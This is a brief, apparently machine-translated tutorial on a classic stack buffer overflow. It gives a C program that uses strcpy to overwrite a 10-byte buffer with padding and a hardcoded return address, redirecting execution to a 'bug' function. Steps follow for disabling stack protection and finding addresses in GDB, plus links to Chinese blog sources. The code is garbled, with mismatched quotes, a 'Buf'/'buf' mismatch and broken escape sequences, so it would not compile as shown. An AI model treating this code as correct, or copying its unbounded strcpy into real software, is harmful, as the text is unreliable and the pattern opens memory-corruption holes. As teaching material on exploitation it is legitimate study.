Attack Code:
#include "stdio.h" #include "string.h" char code[]= "\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\x41" "\x41\x41\x41\x41\ x41 "\x41\x41\x41" "\x41\x41\x41\x41" "\x41\x41"//Both more added "\xbe\x05\x40\x00"//Bug Address "\x00"; void copy (const char *input) {char buf[10]; strcpy (Buf,input); printf ("%s \ n", buf);} void bug (void) {printf ("I shouldn ' t has appeared\n");} int main (int argc,char *argv[]) {copy (code); return 0;}
Attack Process:
1 Turn off Stack protection compilation Open GDB:
2 set breakpoints in both strcpy and printf, run, view the value of the RSP register, and find the address where the strcpy is located.
3 View after running, this becomes the address of the bug.
4 running the program to achieve the purpose of the attack
Resources:
Http://os.it168.com/a2009/0530/1059/000001059910.shtml
http://blog.csdn.net/liigo/article/details/582231
http://blog.163.com/jw_chen_cs/blog/static/20221214820124119642246/
Buffer overflow attack